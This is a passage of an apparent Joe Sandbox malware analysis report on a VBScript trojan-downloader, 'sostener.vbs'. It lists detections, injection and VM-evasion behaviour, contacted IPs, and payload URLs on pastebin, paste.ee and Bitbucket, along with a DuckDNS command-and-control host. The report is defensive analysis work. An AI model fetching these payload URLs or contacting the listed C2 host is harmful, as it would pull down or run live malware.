dnsIp9 64 pastebin.com 104.20.4.235, 443, 49704, 49705 CLOUDFLARENETUS United States 22->64 66 paste.ee 188.114.96.3, 443, 49711, 49728 CLOUDFLARENETUS European Union 22->66 68 2 other IPs or domains 22->68 48 ___win____________...________-------.lnk, MS 22->48 dropped 88 Writes to foreign memory regions 22->88 90 Injects a PE file into a foreign processes 22->90 31 powershell.exe 13 22->31         started        34 RegAsm.exe 22->34         started        37 RegAsm.exe 2 22->37         started        92 Suspicious powershell command line found 29->92 40 powershell.exe 15 29->40         started        42 conhost.exe 29->42         started        file10 signatures11 process12 dnsIp13 50 C:\Users\...\sostener.vbs:Zone.Identifier, ASCII 31->50 dropped 52 C:\Users\user\AppData\Local\...\sostener.vbs, Unicode 31->52 dropped 70 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 34->70 60 toskaadmx.duckdns.org 46.246.14.3, 49712, 7000 PORTLANEwwwportlanecomSE Sweden 37->60 62 3.5.25.83, 443, 49724 AMAZON-AESUS United States 40->62 72 Writes to foreign memory regions 40->72 74 Injects a PE file into a foreign processes 40->74 44 powershell.exe 40->44         started        46 RegAsm.exe 40->46         started        file14 signatures15 process16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                sostener.vbs16%ReversingLabsWin32.Trojan.Honolulu
                sostener.vbs100%AviraVBS/Dldr.Agent.VPWC

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\sostener.vbs100%AviraVBS/Dldr.Agent.VPWC

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
                bitbucket.org0%VirustotalBrowse
                paste.ee1%VirustotalBrowse
                pastebin.com0%VirustotalBrowse
                bbuseruploads.s3.amazonaws.com3%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://oneget.orgX0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                https://oneget.org0%URL Reputationsafe
                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/0%VirustotalBrowse
                https://pastebin.com/raw1%VirustotalBrowse
                https://pastebin.com/raw/sFgsbG3v4%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                https://aui-cdn.atlassian.com/0%VirustotalBrowse
                https://paste.ee1%VirustotalBrowse
                https://analytics.paste.ee1%VirustotalBrowse
                https://cdnjs.cloudflare.com0%VirustotalBrowse
                https://bitbucket.org0%VirustotalBrowse
                https://remote-app-switcher.prod-east.frontend.public.atl-paas.net0%VirustotalBrowse
                http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                http://bbuseruploads.s3.amazonaws.com3%VirustotalBrowse
                https://bbuseruploads.s3.amazonaws.com1%VirustotalBrowse
                http://s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
                https://web-security-reports.services.atlassian.com/csp-report/bb-website0%VirustotalBrowse
                https://dz8aopenkvv6s.cloudfront.net0%VirustotalBrowse
                https://secure.gravatar.com0%VirustotalBrowse
                http://bitbucket.org0%VirustotalBrowse
                http://paste.ee1%VirustotalBrowse
                http://pastebin.com/raw/v9y5q5vv2%VirustotalBrowse
                https://cdn.cookielaw.org/0%VirustotalBrowse
                https://github.com/Pester/Pester1%VirustotalBrowse
                http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;0%VirustotalBrowse
                https://remote-app-switcher.stg-east.frontend.public.atl-paas.net0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                		52.216.144.11
                		truefalseunknown
                bitbucket.org
                		185.166.143.50
                		truefalseunknown
                toskaadmx.duckdns.org
                		46.246.14.3
                		truetrue
                  		unknown
                  paste.ee
                  		188.114.96.3
                  		truetrueunknown
                  pastebin.com
                  		104.20.4.235
                  		truetrueunknown
                  bbuseruploads.s3.amazonaws.com
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://pastebin.com/raw/sFgsbG3vfalseunknown
                  https://pastebin.com/raw/cD7bJS7bfalse
                    		unknown
                    https://paste.ee/d/lHbHo/0true
                      		unknown
                      toskaadmx.duckdns.orgtrue
                        		unknown
                        https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txtfalse
                          		unknown
                          http://pastebin.com/raw/V9y5Q5vvtrue
                            		unknown
                            https://pastebin.com/raw/V9y5Q5vvfalse
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://pastebin.com/rawpowershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              https://contoso.com/Licensepowershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              https://analytics.paste.eepowershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              https://bbuseruploads.s3.amazonaws.com/5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-powershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://paste.eepowershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                HTTPS://PASTEBIN.COM/RAW/CD7BJS7Bpowershell.exe, 00000004.00000002.2176643102.000002870058A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D692B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://crl.microsoftopowershell.exe, 0000000E.00000002.2401200406.00000272D4974000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.google.compowershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    https://contoso.com/powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2176643102.0000028701A14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2254576347.000002871007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E23D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E229F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D3ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2578721401.00000272E6413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CCE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://oneget.orgXpowershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://aui-cdn.atlassian.com/powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    https://cdnjs.cloudflare.compowershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    https://paste.ee/d/lHbHo/0Ppowershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://cdnjs.cloudflare.com;powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://s3-w.us-east-1.amazonaws.compowershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2293886906.0000019BAE651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D2221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3349422989.0000000003081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5AD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0CB31000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://bitbucket.orgpowershell.exe, 00000004.00000002.2176643102.00000287003EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D678B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        http://bbuseruploads.s3.amazonaws.compowershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://secure.gravatar.compowershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://bbuseruploads.s3.amazonaws.comppowershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2176643102.0000028701A14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2254576347.000002871007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E23D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E229F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D3ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2578721401.00000272E6413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CCE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          https://bbuseruploads.s3.amazonaws.compowershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://bbuseruploads.s3.amazohpowershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://paste.eepowershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            https://go.micropowershell.exe, 00000004.00000002.2176643102.0000028701199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D73E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://bitbucket.orgpowershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A69000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            https://www.google.com;powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://contoso.com/Iconpowershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://cdn.cookielaw.org/powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              http://pastebin.com/raw/v9y5q5vvpowershell.exe, 00000004.00000002.2270156438.000002877C720000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                              https://analytics.paste.ee;powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2293886906.0000019BAE670000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2293886906.0000019BAE6BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D2221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5A16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0CB31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://firebasestorage.googlehpowershell.exe, 00000004.00000002.2176643102.000002870195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://pastebin.compowershell.exe, 00000004.00000002.2176643102.0000028701648000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.000002870164D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D79FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A00000.00000004.00000800.00020000.00000000.sdmptrue
                                                    		unknown
                                                    https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txtPpowershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://pastebin.compowershell.exe, 00000004.00000002.2176643102.000002870058A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.000002870164D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D692B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D675B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://themes.googleusercontent.compowershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://oneget.orgpowershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://bbuseruploads.s3.amazohxpowershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.20.4.235
                                                            		pastebin.comUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            188.114.96.3
                                                            		paste.eeEuropean Union
                                                            		13335CLOUDFLARENETUStrue
                                                            3.5.25.83
                                                            		unknownUnited States
                                                            		14618AMAZON-AESUSfalse
                                                            52.216.144.11
                                                            		s3-w.us-east-1.amazonaws.comUnited States
                                                            		16509AMAZON-02USfalse
                                                            185.166.143.50
                                                            		bitbucket.orgGermany
                                                            		16509AMAZON-02USfalse
                                                            46.246.14.3
                                                            		toskaadmx.duckdns.orgSweden
                                                            		42708PORTLANEwwwportlanecomSEtrue

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1524706
                                                            Start date and time:2024-10-03 06:52:10 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 0s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:19
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:sostener.vbs
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winVBS@25/21@6/6
                                                            EGA Information:
                                                            • Successful, ratio: 37.5%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 84
                                                            • Number of non-executed functions: 1
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbs

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 142.250.74.202, 172.217.18.10, 142.250.185.138, 172.217.16.138, 142.250.181.234, 142.250.185.106, 142.250.185.202, 142.250.186.170, 142.250.185.74, 216.58.212.170, 142.250.186.42, 142.250.184.202, 142.250.185.234, 142.250.184.234, 142.250.185.170, 216.58.206.42, 142.250.186.106
                                                            • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, firebasestorage.googleapis.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target RegAsm.exe, PID 7308 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 1020 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 1088 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 5368 because it is empty
